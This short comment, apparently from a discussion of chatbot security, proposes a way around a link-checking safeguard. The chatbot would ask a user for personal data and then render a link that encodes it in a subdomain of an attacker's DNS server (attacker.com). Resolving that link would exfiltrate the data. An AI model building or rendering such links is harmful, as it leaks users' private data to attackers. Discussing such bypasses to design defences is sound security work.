I wonder if this can be bypassed by encoding the data into a subdomain. An attacker would run a DNS server that logs all requests. The chatbot would then ask the user for personal data and the chatbot would create a link to: secretpersonaldataofmyvictim.attacker.com/cat.png
If in the process of checking that URL the domain gets resolved it will send the data to the attacker.